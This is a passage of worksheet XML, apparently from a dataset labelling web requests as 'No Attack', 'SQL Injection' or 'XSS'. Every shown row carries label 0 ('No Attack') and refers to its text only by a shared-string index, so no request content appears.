        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32209" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32209" s="1" t="s">
        <v>28003</v>
      </c>
      <c r="B32209">
        <v>0</v>
      </c>
      <c r="C32209" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32210" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32210" s="1" t="s">
        <v>34600</v>
      </c>
      <c r="B32210">
        <v>0</v>
      </c>
      <c r="C32210" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32211" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32211" s="1" t="s">
        <v>22660</v>
      </c>
      <c r="B32211">
        <v>0</v>
      </c>
      <c r="C32211" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32212" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32212" s="1" t="s">
        <v>23189</v>
      </c>
      <c r="B32212">
        <v>0</v>
      </c>
      <c r="C32212" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32213" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32213" s="1" t="s">
        <v>29737</v>
      </c>
      <c r="B32213">
        <v>0</v>
      </c>
      <c r="C32213" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32214" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32214" s="1" t="s">
        <v>27351</v>
      </c>
      <c r="B32214">
        <v>0</v>
      </c>
      <c r="C32214" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32215" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32215" s="1" t="s">
        <v>36578</v>
      </c>
      <c r="B32215">
        <v>0</v>
      </c>
      <c r="C32215" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32216" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32216" s="1" t="s">
        <v>21049</v>
      </c>
      <c r="B32216">
        <v>0</v>
      </c>
      <c r="C32216" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32217" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32217" s="1" t="s">
        <v>32486</v>
      </c>
      <c r="B32217">
        <v>0</v>
      </c>
      <c r="C32217" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32218" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32218" s="1" t="s">
        <v>22033</v>
      </c>
      <c r="B32218">
        <v>0</v>
      </c>
      <c r="C32218" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32219" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32219" s="1" t="s">
        <v>26947</v>
      </c>
      <c r="B32219">
        <v>0</v>
      </c>
      <c r="C32219" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32220" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32220" s="1" t="s">
        <v>23946</v>
      </c>
      <c r="B32220">
        <v>0</v>
      </c>
      <c r="C32220" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32221" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32221" s="1" t="s">
        <v>36378</v>
      </c>
      <c r="B32221">
        <v>0</v>
      </c>
      <c r="C32221" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32222" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32222" s="1" t="s">
        <v>34089</v>
      </c>
      <c r="B32222">
        <v>0</v>
      </c>
      <c r="C32222" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32223" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32223" s="1" t="s">
        <v>35439</v>
      </c>
      <c r="B32223">
        <v>0</v>
      </c>
      <c r="C32223" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32224" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32224" s="1" t="s">
        <v>28599</v>
      </c>
      <c r="B32224">
        <v>0</v>
      </c>
      <c r="C32224" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32225" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32225" s="1" t="s">
        <v>33429</v>
      </c>
      <c r="B32225">
        <v>0</v>
      </c>
      <c r="C32225" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32226" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32226" s="1" t="s">
        <v>34441</v>
      </c>
      <c r="B32226">
        <v>0</v>
      </c>
      <c r="C32226" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32227" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32227" s="1" t="s">
        <v>9991</v>
      </c>
      <c r="B32227">
        <v>0</v>
      </c>
      <c r="C32227" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32228" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32228" s="1" t="s">
        <v>20683</v>
      </c>
      <c r="B32228">
        <v>0</v>
      </c>
      <c r="C32228" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32229" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32229" s="1" t="s">
        <v>22329</v>
      </c>
      <c r="B32229">
        <v>0</v>
      </c>
      <c r="C32229" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32230" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32230" s="1" t="s">
        <v>37086</v>
      </c>
      <c r="B32230">
        <v>0</v>
      </c>
      <c r="C32230" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32231" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32231" s="1" t="s">
        <v>29801</v>
      </c>
      <c r="B32231">
        <v>0</v>
      </c>
      <c r="C32231" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32232" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32232" s="1" t="s">
        <v>28270</v>
      </c>
      <c r="B32232">
        <v>0</v>
      </c>
      <c r="C32232" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32233" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32233" s="1" t="s">
        <v>36449</v>
      </c>
      <c r="B32233">
        <v>0</v>
      </c>
      <c r="C32233" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32234" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32234" s="1" t="s">
        <v>23247</v>
      </c>
      <c r="B32234">
        <v>0</v>
      </c>
      <c r="C32234" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32235" s="1" t="s">
        <v>32397</v>
      </c>
      <c r="B32235">
        <v>0</v>
      </c>
      <c r="C32235" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32236" s="1" t="s">
        <v>31231</v>
      </c>
      <c r="B32236">
        <v>0</v>
      </c>
      <c r="C32236" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32237" s="1" t="s">
        <v>21079</v>
      </c>
      <c r="B32237">
        <v>0</v>
      </c>
      <c r="C32237" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32238" s="1" t="s">
        <v>30577</v>
      </c>
      <c r="B32238">
        <v>0</v>
      </c>
      <c r="C32238" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32239" s="1" t="s">
        <v>33780</v>
      </c>
      <c r="B32239">
        <v>0</v>
      </c>
      <c r="C32239" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32240" s="1" t="s">
        <v>33577</v>
      </c>
      <c r="B32240">
        <v>0</v>
      </c>
      <c r="C32240" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32241" s="1" t="s">
        <v>30924</v>
      </c>
      <c r="B32241">
        <v>0</v>
      </c>
      <c r="C32241" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32242" s="1" t="s">
        <v>22589</v>
      </c>
      <c r="B32242">
        <v>0</v>
      </c>
      <c r="C32242" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32243" s="1" t="s">
        <v>31697</v>
      </c>
      <c r="B32243">
        <v>0</v>
      </c>
      <c r="C32243" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32244" s="1" t="s">
        <v>29661</v>
      </c>
      <c r="B32244">
        <v>0</v>
      </c>
      <c r="C32244" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32245" s="1" t="s">
        <v>36641</v>
      </c>
      <c r="B32245">
        <v>0</v>
      </c>
      <c r="C32245" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32246" s="1" t="s">
        <v>22482</v>
      </c>
      <c r="B32246">
        <v>0</v>
      </c>
      <c r="C32246" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32247" s="1" t="s">
        <v>34363</v>
      </c>
      <c r="B32247">
        <v>0</v>
      </c>
      <c r="C32247" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32248" s="1" t="s">
        <v>33171</v>
      </c>
      <c r="B32248">
        <v>0</v>
      </c>
      <c r="C32248" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32249" s="1" t="s">
        <v>28508</v>
      </c>
      <c r="B32249">
        <v>0</v>
      </c>
      <c r="C32249" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32250" s="1" t="s">
        <v>20111</v>
      </c>
      <c r="B32250">
        <v>0</v>
      </c>
      <c r="C32250" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32251" s="1" t="s">
        <v>24021</v>
      </c>
      <c r="B32251">
        <v>0</v>
      </c>
      <c r="C32251" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32252" s="1" t="s">
        <v>30468</v>
      </c>
      <c r="B32252">
        <v>0</v>
      </c>
      <c r="C32252" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32253" s="1" t="s">
        <v>21201</v>
      </c>
      <c r="B32253">
        <v>0</v>
      </c>
      <c r="C32253" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32254" s="1" t="s">
        <v>30956</v>
      </c>
      <c r="B32254">
        <v>0</v>
      </c>
      <c r="C32254" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32255" s="1" t="s">
        <v>32016</v>
      </c>
      <c r="B32255">
        <v>0</v>
      </c>
      <c r="C32255" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32256" s="1" t="s">
        <v>36499</v>
      </c>
      <c r="B32256">
        <v>0</v>
      </c>
      <c r="C32256" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32257" s="1" t="s">
        <v>21851</v>
      </c>
      <c r="B32257">
        <v>0</v>
      </c>
      <c r="C32257" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32258" s="1" t="s">
        <v>37396</v>
      </c>
      <c r="B32258">
        <v>0</v>
      </c>
      <c r="C32258" s="7" t="str">
        <f t="shared" si="503"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32259" s="1" t="s">
        <v>33401</v>
      </c>
      <c r="B32259">
        <v>0</v>
      </c>
      <c r="C32259" s="7" t="str">
        <f t="shared" ref="C32259:C32322" si="504">IF(B32259=0,"No Attack", IF(B32259=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32260" s="1" t="s">
        <v>32453</v>
      </c>
      <c r="B32260">
        <v>0</v>
      </c>
      <c r="C32260" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32261" s="1" t="s">
        <v>29200</v>
      </c>
      <c r="B32261">
        <v>0</v>
      </c>
      <c r="C32261" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32262" s="1" t="s">
        <v>32955</v>
      </c>
      <c r="B32262">
        <v>0</v>
      </c>
      <c r="C32262" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32263" s="1" t="s">
        <v>23949</v>
      </c>
      <c r="B32263">
        <v>0</v>
      </c>
      <c r="C32263" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32264" s="1" t="s">
        <v>35435</v>
      </c>
      <c r="B32264">
        <v>0</v>
      </c>
      <c r="C32264" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32265" s="1" t="s">
        <v>32217</v>
      </c>
      <c r="B32265">
        <v>0</v>
      </c>
      <c r="C32265" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32266" s="1" t="s">
        <v>34045</v>
      </c>
      <c r="B32266">
        <v>0</v>
      </c>
      <c r="C32266" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32267" s="1" t="s">
        <v>30264</v>
      </c>
      <c r="B32267">
        <v>0</v>
      </c>
      <c r="C32267" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32268" s="1" t="s">
        <v>21297</v>
      </c>
      <c r="B32268">
        <v>0</v>
      </c>
      <c r="C32268" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32269" s="1" t="s">
        <v>35166</v>
      </c>
      <c r="B32269">
        <v>0</v>
      </c>
      <c r="C32269" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32270" s="1" t="s">
        <v>33427</v>
      </c>
      <c r="B32270">
        <v>0</v>
      </c>
      <c r="C32270" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32271" s="1" t="s">
        <v>24316</v>
      </c>
      <c r="B32271">
        <v>0</v>
      </c>
      <c r="C32271" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32272" s="1" t="s">
        <v>37076</v>
      </c>
      <c r="B32272">
        <v>0</v>
      </c>
      <c r="C32272" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32273" s="1" t="s">
        <v>32305</v>
      </c>
      <c r="B32273">
        <v>0</v>
      </c>
      <c r="C32273" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32274" s="1" t="s">
        <v>21989</v>
      </c>
      <c r="B32274">
        <v>0</v>
      </c>
      <c r="C32274" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32275" s="1" t="s">
        <v>22636</v>
      </c>
      <c r="B32275">
        <v>0</v>
      </c>
      <c r="C32275" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32276" s="1" t="s">
        <v>36866</v>
      </c>
      <c r="B32276">
        <v>0</v>
      </c>
      <c r="C32276" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32277" s="1" t="s">
        <v>30098</v>
      </c>
      <c r="B32277">
        <v>0</v>
      </c>
      <c r="C32277" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32278" s="1" t="s">
        <v>22998</v>
      </c>
      <c r="B32278">
        <v>0</v>
      </c>
      <c r="C32278" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32279" s="1" t="s">
        <v>23657</v>
      </c>
      <c r="B32279">
        <v>0</v>
      </c>
      <c r="C32279" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32280" s="1" t="s">
        <v>20720</v>
      </c>
      <c r="B32280">
        <v>0</v>
      </c>
      <c r="C32280" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32281" s="1" t="s">
        <v>35681</v>
      </c>
      <c r="B32281">
        <v>0</v>
      </c>
      <c r="C32281" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32282" s="1" t="s">
        <v>29523</v>
      </c>
      <c r="B32282">
        <v>0</v>
      </c>
      <c r="C32282" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32283" s="1" t="s">
        <v>30346</v>
      </c>
      <c r="B32283">
        <v>0</v>
      </c>
      <c r="C32283" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32284" s="1" t="s">
        <v>36564</v>
      </c>
      <c r="B32284">
        <v>0</v>
      </c>
      <c r="C32284" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32285" s="1" t="s">
        <v>35893</v>
      </c>
      <c r="B32285">
        <v>0</v>
      </c>
      <c r="C32285" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32286" s="1" t="s">
        <v>35347</v>
      </c>
      <c r="B32286">
        <v>0</v>
      </c>
      <c r="C32286" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32287" s="1" t="s">
        <v>10567</v>
      </c>
      <c r="B32287">
        <v>0</v>
      </c>
      <c r="C32287" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32288" s="1" t="s">
        <v>10568</v>
      </c>
      <c r="B32288">
        <v>0</v>
      </c>
      <c r="C32288" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32289" s="1" t="s">
        <v>10569</v>
      </c>
      <c r="B32289">
        <v>0</v>
      </c>
      <c r="C32289" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32290" s="1" t="s">
        <v>10570</v>
      </c>
      <c r="B32290">
        <v>0</v>
      </c>
      <c r="C32290" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32291" s="1" t="s">
        <v>10571</v>
      </c>
      <c r="B32291">
        <v>0</v>
      </c>
      <c r="C32291" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32292" s="1" t="s">
        <v>10572</v>
      </c>
      <c r="B32292">
        <v>0</v>
      </c>
      <c r="C32292" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32293" s="1" t="s">
        <v>10573</v>
      </c>
      <c r="B32293">
        <v>0</v>
      </c>
      <c r="C32293" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32294" s="1" t="s">
        <v>10574</v>
      </c>
      <c r="B32294">
        <v>0</v>
      </c>
      <c r="C32294" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32295" s="1" t="s">
        <v>35193</v>
      </c>
      <c r="B32295">
        <v>0</v>
      </c>
      <c r="C32295" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32296" s="1" t="s">
        <v>23221</v>
      </c>
      <c r="B32296">
        <v>0</v>
      </c>
      <c r="C32296" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32297" s="1" t="s">
        <v>30230</v>
      </c>
      <c r="B32297">
        <v>0</v>
      </c>
      <c r="C32297" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32298" s="1" t="s">
        <v>28565</v>
      </c>
      <c r="B32298">
        <v>0</v>
      </c>
      <c r="C32298" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32299" s="1" t="s">
        <v>30050</v>
      </c>
      <c r="B32299">
        <v>0</v>
      </c>
      <c r="C32299" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32300" s="1" t="s">
        <v>28470</v>
      </c>
      <c r="B32300">
        <v>0</v>
      </c>
      <c r="C32300" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32301" s="1" t="s">
        <v>32208</v>
      </c>
      <c r="B32301">
        <v>0</v>
      </c>
      <c r="C32301" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32302" s="1" t="s">
        <v>21022</v>
      </c>
      <c r="B32302">
        <v>0</v>
      </c>
      <c r="C32302" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32303" s="1" t="s">
        <v>34790</v>
      </c>
      <c r="B32303">
        <v>0</v>
      </c>
      <c r="C32303" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32304" s="1" t="s">
        <v>23255</v>
      </c>
      <c r="B32304">
        <v>0</v>
      </c>
      <c r="C32304" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32305" s="1" t="s">
        <v>33508</v>
      </c>
      <c r="B32305">
        <v>0</v>
      </c>
      <c r="C32305" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32306" s="1" t="s">
        <v>27413</v>
      </c>
      <c r="B32306">
        <v>0</v>
      </c>
      <c r="C32306" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32307" s="1" t="s">
        <v>23197</v>
      </c>
      <c r="B32307">
        <v>0</v>
      </c>
      <c r="C32307" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32308" s="1" t="s">
        <v>27743</v>
      </c>
      <c r="B32308">
        <v>0</v>
      </c>
      <c r="C32308" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32309" s="1" t="s">
        <v>36012</v>
      </c>
      <c r="B32309">
        <v>0</v>
      </c>
      <c r="C32309" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32310" s="1" t="s">
        <v>30055</v>
      </c>
      <c r="B32310">
        <v>0</v>
      </c>
      <c r="C32310" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32311" s="1" t="s">
        <v>22038</v>
      </c>
      <c r="B32311">
        <v>0</v>
      </c>
      <c r="C32311" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32312" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32312" s="1" t="s">
        <v>24064</v>
      </c>
      <c r="B32312">
        <v>0</v>
      </c>
      <c r="C32312" s="7" t="str">
        <f t="shared" si="504"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32313" spans="1:3" x14ac:dyDescent="0.3">
